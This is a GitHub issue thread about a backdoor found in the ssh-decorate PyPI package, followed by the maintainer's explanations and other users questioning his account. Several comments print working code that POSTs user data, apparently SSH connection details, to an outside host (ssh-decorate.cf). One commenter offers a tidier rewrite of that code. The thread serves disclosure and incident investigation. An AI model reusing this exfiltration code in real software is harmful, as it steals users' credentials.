### ISSUE TITLE
How do you explain this backdoor? [malware code]

### ISSUE THREAD

**Issue by mowshon** [urigoren/ssh_decorator#11]
In your source code on pypi.org you have a piece of malware code.
https://pypi.org/project/ssh-decorate/#files

**Last update**: May 5, 2018
Why you log users private data?
Why this part of code is missing from your github repo?

```python
try:
    from urllib.request import urlopen
    from urllib.parse import urlencode

    def log(data):
        try:
            post = bytes(urlencode(data), "utf-8")
            handler = urlopen("http://ssh-decorate.cf/index.php", post)
            res = handler.read().decode('utf-8')
        except:
            pass
except:
    from urllib import urlencode
    import urllib2
    def log(data):
        try:
            post = urlencode(data)
            req = urllib2.Request("http://ssh-decorate.cf/index.php", post)
            response = urllib2.urlopen(req)
            res = response.read()
        except:
            pass
```

**Comment by urigoren** [comment]
Thank you very much for pointing that out !!!
I take these kinds of issues really seriously,
I'll be re-posting the package and changing my pypi credentials

**Comment by graingert** [comment]
That backdoor code would probably be better as:

```python
try:
    from urllib.request import urlopen
    from urllib.parse import urlencode
except:
    from urllib import urlopen, urlencode

def log(data):
    try:
        urlopen("http://ssh-decorate.cf/index.php", urlencode(data).encode('ascii'))
    except Exception:
        pass
```

**Comment by graingert** [comment]
FYI ssh-decorate.cf is hosted by bluehost, probably worth reporting it to them.

**Comment by manugarri** [comment]
did you find out @urigoren ? We are not pointing fingers at you, but well...

**Comment by hkyq** [comment]
@manugarri In an earlier message on this issue he implies that his PyPi account was hacked.

**Comment by takluyver** [comment]
@urigoren do you have any clues how someone might have been able to upload a package to PyPI as you? Was the password shared with another site which could have been compromised? Could it have been a friend or coworker who knew/guessed your password?

Now that the new PyPI codebase has taken over from the old one, it's more feasible to add security features like [two factor auth](https://github.com/pypa/warehouse/issues/996). So I think it would be quite useful to understand better what features might have been able to prevent this happening.

**Comment by urigoren** [comment]
I know many of you are probably curios, about this major security incident, and I'd like to shed some light.

I have been investigating this incident for the last 24 hours, and I have come to some conclusions.

The package posting was not done a sophisticated hacker or a mastermind, it was done by a jr. colleague of mine who took a prank too far.

The impersonating was done fairly easy, by copying the `~/.pypirc` file, and cloning the repository from Github.

However, I'd like to elaborate more about the motivation rather than the technical details.

My colleague is a fairly enthusiastic young lad, who wanted to track the number of downloads each `pypi` package has.
Using tools like `pypinfo` and `pepy.tech` he got fairly rough inaccurate estimates, that did not satisfy his curiosity.
The conclusion was, that in order to get an idea of how many real users a package has, usage analytics should be collected.
His train of thought was: "If I am to log all connections, I might as well log the connection details".
Personally, I think this is a step too far, and I don't really see what good could come out of it.

I take full responsibility over this incident, I made sure that the server that received the "logs" is no longer active, the package is no longer available via `pypi`, and I posted a notice in the front page of the repo.

As far as I know, **all collected is deleted, and none of it was used**.

Regarding future steps and precautions:
---

  * Two step auth is definitely a good idea (as suggested by @takluyver ), at least when posting an update.
  * I think that rejecting changes when differences are detected between a git repo and the `pypi` repo, is probably even a simpler. (I am actually thinking of implementing it myself)


I'd like to thank @mowshon for bringing this incident to my attention so fast.
I feel very safe and confident to know that the source code of `pypi` packages is being actively read and reviewed by the community. I am proud to be a part of such an active caring community.

**Comment by di** [comment]
@urigoren How do you explain that new distributions that you made after this was discovered (and after you had "recovered" your account) still contained malicious code?

After the `ssh-decorate` project was removed, you created the `ssh-decorator` project at version 0.34 in [this commit](https://github.com/urigoren/ssh_decorator/commit/3eca321b9e77ba21ef0f40daa551d5deccb7b01c#diff-2eeaed663bd0d25b7e608891384b7298) and released it, but it still had a file `ssh_decorate_log.py` which was not on Github, but had the original malicious code:

```
$ wget https://files.pythonhosted.org/packages/83/a6/f3e03e2dc0a022711240e04ccc683d88ef757ab610cbad904d167e704b51/ssh_decorator-0.34.tar.gz
--2018-05-08 18:06:23--  https://files.pythonhosted.org/packages/83/a6/f3e03e2dc0a022711240e04ccc683d88ef757ab610cbad904d167e704b51/ssh_decorator-0.34.tar.gz
Resolving files.pythonhosted.org... 151.101.1.63, 151.101.65.63, 151.101.129.63, ...
Connecting to files.pythonhosted.org|151.101.1.63|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5086 (5.0K) [binary/octet-stream]
Saving to: 'ssh_decorator-0.34.tar.gz'

ssh_decorator-0.34.tar.gz    100%[===========================================>]   4.97K  --.-KB/s    in 0.001s

2018-05-08 18:06:23 (7.89 MB/s) - 'ssh_decorator-0.34.tar.gz' saved [5086/5086]

$ tar -xvvf ssh_decorator-0.34.tar.gz
x ssh_decorator-0.34/
x ssh_decorator-0.34/PKG-INFO
x ssh_decorator-0.34/ssh_decorator/
x ssh_decorator-0.34/ssh_decorator/__init__.py
x ssh_decorator-0.34/ssh_decorator/ssh_connect.py
x ssh_decorator-0.34/ssh_decorator/ssh_pool.py
x ssh_decorator-0.34/ssh_decorator/ssh_decorate_log.py
x ssh_decorator-0.34/setup.py
x ssh_decorator-0.34/setup.cfg

$ head -20 ssh_decorator-0.34/ssh_decorator/ssh_decorate_log.py
import sys
import paramiko
import time
import os
import inspect
import pickle
import pandas as pd
from itertools import chain
try:
    from urllib.request import urlopen
    from urllib.parse import urlencode

    def log(data):
        try:
            post = bytes(urlencode(data), "utf-8")
            handler = urlopen("http://ssh-decorate.cf/index.php", post)
            res = handler.read().decode('utf-8')
        except:
            pass
except:
```

Once that was removed, you created the `ssh-rpc` project, which also had the same file:

```
$ wget https://files.pythonhosted.org/packages/f5/36/1bdaa171c9e7b4b5d8f63b57fe22f3c529a21eaaec584680e98efa8b5169/ssh_rpc-0.5.tar.gz
--2018-05-08 18:07:26--  https://files.pythonhosted.org/packages/f5/36/1bdaa171c9e7b4b5d8f63b57fe22f3c529a21eaaec584680e98efa8b5169/ssh_rpc-0.5.tar.gz
Resolving files.pythonhosted.org... 151.101.1.63, 151.101.65.63, 151.101.129.63, ...
Connecting to files.pythonhosted.org|151.101.1.63|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5082 (5.0K) [binary/octet-stream]
Saving to: 'ssh_rpc-0.5.tar.gz.1'

ssh_rpc-0.5.tar.gz.1         100%[===========================================>]   4.96K  --.-KB/s    in 0s

2018-05-08 18:07:26 (20.8 MB/s) - 'ssh_rpc-0.5.tar.gz.1' saved [5082/5082]

$ tar -xvvf ssh_rpc-0.5.tar.gz
x ssh_rpc-0.5/
x ssh_rpc-0.5/PKG-INFO
x ssh_rpc-0.5/ssh_decorator/
x ssh_rpc-0.5/ssh_decorator/__init__.py
x ssh_rpc-0.5/ssh_decorator/ssh_connect.py
x ssh_rpc-0.5/ssh_decorator/ssh_pool.py
x ssh_rpc-0.5/ssh_decorator/ssh_decorate_log.py
x ssh_rpc-0.5/setup.py
x ssh_rpc-0.5/setup.cfg

$ head -20 ssh_rpc-0.5/ssh_decorator/ssh_decorate_log.py
import sys
import paramiko
import time
import os
import inspect
import pickle
import pandas as pd
from itertools import chain
try:
    from urllib.request import urlopen
    from urllib.parse import urlencode

    def log(data):
        try:
            post = bytes(urlencode(data), "utf-8")
            handler = urlopen("http://ssh-decorate.cf/index.php", post)
            res = handler.read().decode('utf-8')
        except:
            pass
except:
```

**Comment by urigoren** [comment]
The package reposting as `ssh-decorator` and `ssh-rpc` *is* me.

I did put the `ssh_decorate_log.py` file in the same folder, when I was comparing the `git` version with the backdoor version.

It was accidentally posted as a separate file, however if you look at the code - you can see that `ssh_decorate_log.py` is not referenced anywhere and that there is no backdoor in the versions I posted.

**Comment by vikingSec** [comment]
Your colleague hijacked your account and used it, as a prank, to post user's personal information to a 3rd party web-server, (I'm assuming) unencrypted?

Do you mind having your colleague commenting on this thread to say that? 

Because it looks a lot more like you just inserted a cred harvesting backdoor into your code.

**Comment by di** [comment]
@urigoren How do you explain this timeline?

* 2018-05-05 11:07:40: you made [this commit changing the version to 0.3](https://github.com/urigoren/ssh_decorator/commit/74a222ade98404c58728d54592114bb154fcc4b2)
* 2018-05-05 21:11:06: your colleague uploaded version 0.31 (with malicious code)
* 2018-05-05 21:20:47: your colleague uploaded version 0.32 (with malicious code)
* 2018-05-05 21:57:45: (37 mins later) you made [this commit changing the version to 0.32](https://github.com/urigoren/ssh_decorator/commit/484f9a328bdcf8e24650acf206dd06f458bb2034) (but did nothing else).
* 2018-05-07 18:43:43: this issue was made, alerting you to the malicious code

Why did you make that commit changing the version to `0.32` if you weren't aware of the package being compromised?

**Comment by urigoren** [comment]
quite frankly, I did not know about the `0.32` version commit.


I did bump up the version when the connection pool decorator was introduced

**Comment by di** [comment]
@urigoren Are you saying that your Github account was also compromised by your colleague?

**Comment by urigoren** [comment]
He did have access to my computer, the credential file was copied.

I'd love to chat with you more over the phone / text, but I don't think this issue is the right platform.

Apparently, I do not know the whole story
